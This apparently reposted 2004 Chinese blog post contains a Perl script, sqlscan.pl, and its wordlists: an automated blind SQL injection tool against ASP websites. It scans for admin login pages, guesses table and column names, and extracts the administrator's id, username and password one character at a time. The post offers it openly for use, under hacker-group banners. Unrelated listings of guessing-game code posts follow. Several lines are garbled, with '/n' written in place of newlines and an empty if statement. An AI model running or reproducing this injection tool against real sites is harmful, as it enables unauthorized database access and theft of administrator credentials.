ascc+asp自动注射代码,可以猜后台

原创 2004年08月31日 15:21:00
sqlscan.pl
Submitted by superhei on 2004, July 8, 2:17 AM. 我的DD
#!/usr/bin/perl
#Codz By 黑嘿黑<cnhacker521@hotmail.com>2004/1/21.
#Thx MIX

$|=1;
use IO::Socket;

print "=======================================================================/n";
print " The sqlform-find Script Codz By 黑嘿黑<QQ:123230273> /n";
print " Our Team : www.cnse8.com /n";
print " My Home : xyhack.91i.net /n";
print "=======================================================================/n";
print "Usage: sql.exe 127.0.0.1 80 /test/wenxue/readarticle.asp?id=3 测试成功 /n";
print "-----------------------------------------------------------------------/n";

if ($#ARGV<1)
if ($#ARGV>1){
$host=$ARGV[0];
$port=$ARGV[1];
$way=$ARGV[2];
$judge=$ARGV[3];}

open(DB, 'sqlfrom.txt') || die "Can't open splfrom.txt.";
@Form = <DB>;
close (DB);
open(L, 'lines.txt') || die "Can't open lines.txt.";
@lines = <L>;
close (L);
open(LG, 'login.txt') || die "Can't open login.txt.";
@login = <LG>;
close (LG);

foreach $log (@login){
chomp $log;
@res=str1();
foreach $check (@res){
($http,$code,$blah) = split(/ /,$check);
if($code == 200){
print "Kaka !! Find the login: http://$host$way1$log/n";
}
}
}
foreach $sqlfrom (@Form){
chomp $sqlfrom;
$line="*";
@res=str();
@num=grep /$judge/, @res;
$size=@num;
if ($size > 0){
print "/nKaKa !! Find the sqlfrom is /U/a/a$sqlfrom/E: /n";
foreach $line1 (@lines){
chomp $line1;
$line=$line1;
@res=str();
@num=grep /$judge/, @res;
$size=@num;
if ($size > 0){
print "/a$line1/n";
}
}
}
}

print "/a/a/nInput the SQLForm of admin !/n$SQLForm=";$SQLForm=<STDIN>;chomp $SQLForm;
print "$id=";$ids=<STDIN>;chomp $ids;
print "$Username=";$usernames=<STDIN>;chomp $usernames;
print "$Password=";$passwords=<STDIN>;chomp $passwords;
print "/n/nNow , Start to Crack ! Please wait....../n/n";

#under here is SQL Words
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20$ids=";
$path2 =")";
$id = crackint();
print "/n/nSuccessful,The id of the first admin's id is /a$id ./n/n";

$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20len($passwords)=";
$path2 = "%20and%20$ids=$id)";
$len = crackint();
print "/n/nSuccessful,The len of admin's password is /a$len ./n/n";

$path1 = "%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20left($passwords,";
$path2 = ")='";
$path3 = "'%20and%20$ids=$id)";
@password = crackchar();
print "/n/nSuccessful,The admin's password is /a/a@password ./n/n";

$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20len($usernames)=";
$path2 = "%20and%20$ids=$id)";
$len = crackint();
print "/n/nSuccessful,The len of admin's name is $len ./n/n";

$path1 = "%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20left($usernames,";
$path2 = ")='";
$path3 = "'%20and%20$ids=$id)";
@username = crackchar();
print "/n/nSuccessful,The admin's username is /a/a@username ./n/n";

print "KaKa !! /a/a/you can use /nusername: @username/npassword: @password/nto login test !/r/n";


sub crackint {
@dic=(1..100);
for ($i=0;$i<@dic;$i++)
{
my $path=$path1.$dic[$i];
my $path=$path.$path2;
$req = "GET $way$path HTTP/1.0/r/n".
"Referer: http://$host$way/r/n".
"Host: $host/n/n";
print "$dic[$i].";
sleep(1);
@in = sock($req);
@num=grep /$judge/, @in;
$size=@num;
if ($size > 0) {
return $dic[$i];
last;
}
}
}


sub crackchar {
my $pws;
my @dic11=(0..9);
my @dic12=(a..z);
my @dic13=(A..Z);
my @special=qw(` ~ ! @ # $ %25 ^ %26 * /( /) _ %2b = - { } [ ] : " ; < > ? | , . / /);
my @special2=qw( ` ~ ! · # ¥ % …… — * ( ) —— + - = { } [ ] : ” “ ; ’ 《 》 ? │ , 。 / 、 〈 〉 ');
my @dic=(@dic11,@dic12,@dic13,@special,@special2);
for ($j=1;$j<=$len;$j++)
{
for ($i=0;$i<@dic;$i++)
{
my $key=$pws.$dic[$i];
my $path=$path1.$j;
my $path=$path.$path2;
my $path=$path.$key;
my $path=$path.$path3;

$req = "GET $way$path HTTP/1.0/r/n".
"Referer: http://$host$way/r/n".
"Host:$host/n/n";
print "$dic[$i].";
sleep(1);
@in =sock($req);
@num=grep /$judge/, @in;
$size=@num;
if ($size > 0) {
$th=$j.th;
print "/nSuccessful,The $th word of the char is $dic[$i] /n";
$pws=$pws.$dic[$i];
last;
}
}
}

$pws=~s//%2b//+/ig;
$pws=~s//%25//%/ig;
$pws=~s//%26//&/ig;
return $pws;
}

sub str{
$path="%20and%20exists(select%20".$line."%20from%20$sqlfrom)";
$req = "GET $way$path HTTP/1.0/n".
"Host: $host/n".
"Referer: $host/n".
"Cookie: /n/n";
sock($req);
}

sub str1{
@s=split(////,$way);
$s=@s;
$ss=@s[$i-1];
$d=length($ss);
$e=length($way);
$way1=substr($way,0,$e-$d);
$req = "GET $way1$log HTTP/1.0/n".
"Host: $host/n".
"Referer: $host/n".
"Cookie: /n/n";
sock($req);
}

sub sock{
my ($req) = @_;
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host /n";

print $connection $req;
my @res = <$connection>;
close $connection;
return @res;
}
sub usage {
print "/nInput the Host Info !/n$Host=";$host=<STDIN>;chomp $host;
print "$Port=";$port=<STDIN>;chomp $port;
print "$Way=";$way=<STDIN>;chomp $way;
print "/Input the Judge Words !/n$Judge=";$judge=<STDIN>;chomp $judge;
}


=================== end =============================
sqlfrom.txt:

admin
user
users
userinfo
admin_userinfo
password
adminuser
manboard
diaryuseruser
pwd
t_user
用户
管理员

lines.txt:

id
userid
username
usr
admin
name
user
userpwd
password
pwd
passwd
psword
pass
pws
pwa
user_id
user_name
user_pass
admin_id
admin_name
admin_pass
admin_password
u_id
u_name
u_password
auid
apwd
姓名
密码

login.txt:

pass.asp
password.asp
psd.asp
username/login.asp
username/admin.asp
denglu.asp
login/admin.asp
login/login.asp
admin_login.asp
login_admin.asp
userlogin.asp
User.Asp
user/login.asp
admin/admin.asp
admin/login.asp
admin.asp
login.htm
admin_login/admin.asp
login_admin/login_admin.asp
login.asp
admpast.asp
admin_login.asp
adminlogin.asp
manageNews/index.htm
Admin/admin_login.asp
admin_index.asp
adminn/index.asp
admin/adminlogin.asp
admin/default.asp
manage/login.asp

猜字母游戏java源代码

import java.util.Arrays; import java.util.Random; import java.util.Scanner; public class GuseeLette...
  • guxinaiheqiao
  • guxinaiheqiao
  • 2014年09月12日 17:36
  • 1947

猜数游戏代码--图形界面

猜数游戏:1:由系统随机产生一个数字,由用户猜,并给出偏大偏小的信息,直到猜出正确答案,系统给出猜的次数                     2:共分为三个等级,等级一为一位数,等级二为两位数,...
  • u012116457
  • u012116457
  • 2013年11月03日 16:17
  • 1526

[iOS开发项目-7] 超级猜图

本项目是取自传智播客的教学项目,加入笔者的修改和润饰。1. 项目名称:超级猜图2. 项目截图展示3. 项目功能 点击图片或“大图”按钮,图片放大;再点击图片或点击周围区域,图片复原。 点击备选按钮,相...
  • apple890111
  • apple890111
  • 2015年10月06日 23:21
  • 619

Android 猜歌曲游戏开发

一、界面如图: 1)主界面 2)对话框界面 3)过关界面 4)通关界面 二、实现步骤三、详细代码 1)主界面代码:/** * @Project App_Imooc * @Package...
  • lovoo
  • lovoo
  • 2016年05月03日 08:23
  • 1100

C#猜数字游戏

效果如图: 代码: using System; using System.Collections.Generic; using System.ComponentModel; using S...
  • a716121
  • a716121
  • 2016年05月22日 21:15
  • 1636

JAVA之猜数字游戏

JAVA之猜数字游戏
  • netuser1937
  • netuser1937
  • 2017年01月23日 11:19
  • 3399

简单java程序--猜字母游戏

package test;import java.util.Scanner;//猜字符游戏public class GuessingGame {public static void main(Stri...
  • u013161399
  • u013161399
  • 2015年07月25日 15:12
  • 2596

Android 你画我猜核心实现源码,客户端+客户端

第一次写博客,就来一个以前写的你画我猜客户端和服务器端的实现吧! 客户端: 实现原理就是自定义View,然后继承的是SurfaceView,不继承View的原因就是SurfaceView这个视图里...
  • zhaohui_android
  • zhaohui_android
  • 2017年03月09日 19:21
  • 854

android猜数字游戏

猜数字游戏大家都懂的,直接上代码 package com.guessnum; import java.util.Random; public class Guess {  private Ran...
  • semenry
  • semenry
  • 2013年10月10日 11:16
  • 1577

Android-看图猜成语

这是一个很简单的游戏,以前写着练手的;忽然看到了,给大家分享一下; 效果图如下: 界面设计...
  • u010623068
  • u010623068
  • 2016年12月29日 17:27
  • 736
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:ascc+asp自动注射代码,可以猜后台
举报原因:
原因补充:

(最多只允许输入30个字)